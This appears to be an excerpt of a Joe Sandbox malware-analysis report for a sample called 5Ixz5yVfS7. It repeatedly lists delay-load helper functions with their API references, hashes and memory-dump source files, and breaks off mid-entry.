                  • API String ID: 1269201914-0
                  • Opcode ID: 93e8d279a38748761c817fd6462b685e91f84aa386362aad38a525761c905dbe
                  • Instruction ID: a03176a2f60ba899c2929cc584d6a04471ea02c867ec609cfe8914c30461c5fc
                  • Opcode Fuzzy Hash: 93e8d279a38748761c817fd6462b685e91f84aa386362aad38a525761c905dbe
                  • Instruction Fuzzy Hash: A0A0029556D5037C710871516D5BE3F0B3CE4C6B517304D1DB447954C1954458455431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 705c65c8f1904bdf26c42fa72c48d15034cade27b0105e88de146a92dfaa6fa0
                  • Instruction ID: a03176a2f60ba899c2929cc584d6a04471ea02c867ec609cfe8914c30461c5fc
                  • Opcode Fuzzy Hash: 705c65c8f1904bdf26c42fa72c48d15034cade27b0105e88de146a92dfaa6fa0
                  • Instruction Fuzzy Hash: A0A0029556D5037C710871516D5BE3F0B3CE4C6B517304D1DB447954C1954458455431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 64411cd185e31cc3dc7d7e397a3df54511da573d1c23a13531305f9645ae98b2
                  • Instruction ID: a03176a2f60ba899c2929cc584d6a04471ea02c867ec609cfe8914c30461c5fc
                  • Opcode Fuzzy Hash: 64411cd185e31cc3dc7d7e397a3df54511da573d1c23a13531305f9645ae98b2
                  • Instruction Fuzzy Hash: A0A0029556D5037C710871516D5BE3F0B3CE4C6B517304D1DB447954C1954458455431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 291ce661511773ef02c38e91f9072a1f411a123a7beae1dac1d908253de8293d
                  • Instruction ID: a03176a2f60ba899c2929cc584d6a04471ea02c867ec609cfe8914c30461c5fc
                  • Opcode Fuzzy Hash: 291ce661511773ef02c38e91f9072a1f411a123a7beae1dac1d908253de8293d
                  • Instruction Fuzzy Hash: A0A0029556D5037C710871516D5BE3F0B3CE4C6B517304D1DB447954C1954458455431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 143c0131583d496a902afe9dd04f1525da2ed288d587a8000172719a5e9bda28
                  • Instruction ID: a03176a2f60ba899c2929cc584d6a04471ea02c867ec609cfe8914c30461c5fc
                  • Opcode Fuzzy Hash: 143c0131583d496a902afe9dd04f1525da2ed288d587a8000172719a5e9bda28
                  • Instruction Fuzzy Hash: A0A0029556D5037C710871516D5BE3F0B3CE4C6B517304D1DB447954C1954458455431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 46ab0ed39e677d4c84d0f53904ecb81f8f7f77cd4160196a22ac73755be233ae
                  • Instruction ID: a03176a2f60ba899c2929cc584d6a04471ea02c867ec609cfe8914c30461c5fc
                  • Opcode Fuzzy Hash: 46ab0ed39e677d4c84d0f53904ecb81f8f7f77cd4160196a22ac73755be233ae
                  • Instruction Fuzzy Hash: A0A0029556D5037C710871516D5BE3F0B3CE4C6B517304D1DB447954C1954458455431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005AD8A3
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 07b461907308b33adda6760d134a7506fafbf4527cf31eb9b0776ca3cadd8959
                  • Instruction ID: a03176a2f60ba899c2929cc584d6a04471ea02c867ec609cfe8914c30461c5fc
                  • Opcode Fuzzy Hash: 07b461907308b33adda6760d134a7506fafbf4527cf31eb9b0776ca3cadd8959
                  • Instruction Fuzzy Hash: A0A0029556D5037C710871516D5BE3F0B3CE4C6B517304D1DB447954C1954458455431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005ADAB2
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 52ca588de1f6cbde9c752a339396daca3d664d7b73e7a84f20ecf7125a924658
                  • Instruction ID: b481695a6a3a269e01a9c7d1f877c2da5a2ebdc2c9db720e568dc34959b98162
                  • Opcode Fuzzy Hash: 52ca588de1f6cbde9c752a339396daca3d664d7b73e7a84f20ecf7125a924658
                  • Instruction Fuzzy Hash: 71A001A62AD143BC31087292BD5BE3F0A7CE4C6BA27308A1EB40B95899A99959495831
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005ADAB2
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 2f89de4ae96753a12cb09b4fd72563d5a8812b242a8f15e6132880fa3c8c6ddf
                  • Instruction ID: b481695a6a3a269e01a9c7d1f877c2da5a2ebdc2c9db720e568dc34959b98162
                  • Opcode Fuzzy Hash: 2f89de4ae96753a12cb09b4fd72563d5a8812b242a8f15e6132880fa3c8c6ddf
                  • Instruction Fuzzy Hash: 71A001A62AD143BC31087292BD5BE3F0A7CE4C6BA27308A1EB40B95899A99959495831
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005ADAB2
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 186f36c2133ca0d6c8bf21502a4f0900d3b3db52e60aff9b43a7cacf01fa3e6d
                  • Instruction ID: b481695a6a3a269e01a9c7d1f877c2da5a2ebdc2c9db720e568dc34959b98162
                  • Opcode Fuzzy Hash: 186f36c2133ca0d6c8bf21502a4f0900d3b3db52e60aff9b43a7cacf01fa3e6d
                  • Instruction Fuzzy Hash: 71A001A62AD143BC31087292BD5BE3F0A7CE4C6BA27308A1EB40B95899A99959495831
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005ADAB2
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6b3bdbb89a7b7b7311d6a8ea5c7a62bf1e49ff88192942090cf337bd170c9369
                  • Instruction ID: b481695a6a3a269e01a9c7d1f877c2da5a2ebdc2c9db720e568dc34959b98162
                  • Opcode Fuzzy Hash: 6b3bdbb89a7b7b7311d6a8ea5c7a62bf1e49ff88192942090cf337bd170c9369
                  • Instruction Fuzzy Hash: 71A001A62AD143BC31087292BD5BE3F0A7CE4C6BA27308A1EB40B95899A99959495831
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005ADAB2
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6f2c3db789c4b07d9805c039a36f04db8fd015c14cf3f0474b0e41dd43dcee9a
                  • Instruction ID: b481695a6a3a269e01a9c7d1f877c2da5a2ebdc2c9db720e568dc34959b98162
                  • Opcode Fuzzy Hash: 6f2c3db789c4b07d9805c039a36f04db8fd015c14cf3f0474b0e41dd43dcee9a
                  • Instruction Fuzzy Hash: 71A001A62AD143BC31087292BD5BE3F0A7CE4C6BA27308A1EB40B95899A99959495831
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005ADAB2
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 4ff9d1ffbb3cd3d32fb85994f15ba675106e719a0c5f5315a5a19dcc8c891326
                  • Instruction ID: 4e6c49486d21bbf956bd2890eb59aa461d87a18769d9696e8443690a5253f2e3
                  • Opcode Fuzzy Hash: 4ff9d1ffbb3cd3d32fb85994f15ba675106e719a0c5f5315a5a19dcc8c891326
                  • Instruction Fuzzy Hash: B1A011A22AC0023C3008B282BC0BE3F0A3CF0C2B223308A0EB00BA0888A88808080830
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005ADBD5
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 75cf9edae0334b5e459976e98a4be215273b762b69805b46a5dec024db6f0347
                  • Instruction ID: c695c39944de4635dd9faee6b71a3a63235271a583efc3851a6f416a00f56bae
                  • Opcode Fuzzy Hash: 75cf9edae0334b5e459976e98a4be215273b762b69805b46a5dec024db6f0347
                  • Instruction Fuzzy Hash: 77A001AA2AD10BBC310872916D5BE7F0B3CF4CAFA1731891EB50B95881AA905C595832
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005ADC36
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d8126e1ee56940b117841f159a292aaae92c4dbcaf1d190c93a85fcf1fc92ea4
                  • Instruction ID: 8554e4e4964f7f1ce9951d5651bb9f6a1629b785414c4613b6645bf982c78cba
                  • Opcode Fuzzy Hash: d8126e1ee56940b117841f159a292aaae92c4dbcaf1d190c93a85fcf1fc92ea4
                  • Instruction Fuzzy Hash: 97A0029956D1077C310C71516D57D7F0A3CE4C5F617704D1DB5079545155805C455431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005ADC36
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 83d6c299b03b940e94ef51a200c149213c07b13752735546ae207296e3a3f539
                  • Instruction ID: 8554e4e4964f7f1ce9951d5651bb9f6a1629b785414c4613b6645bf982c78cba
                  • Opcode Fuzzy Hash: 83d6c299b03b940e94ef51a200c149213c07b13752735546ae207296e3a3f539
                  • Instruction Fuzzy Hash: 97A0029956D1077C310C71516D57D7F0A3CE4C5F617704D1DB5079545155805C455431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005ADBD5
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: bc018e1f2e763117e7c8cbea143cf460f7ac35527427f1edecce7618e9a1149b
                  • Instruction ID: c695c39944de4635dd9faee6b71a3a63235271a583efc3851a6f416a00f56bae
                  • Opcode Fuzzy Hash: bc018e1f2e763117e7c8cbea143cf460f7ac35527427f1edecce7618e9a1149b
                  • Instruction Fuzzy Hash: 77A001AA2AD10BBC310872916D5BE7F0B3CF4CAFA1731891EB50B95881AA905C595832
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005ADBD5
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
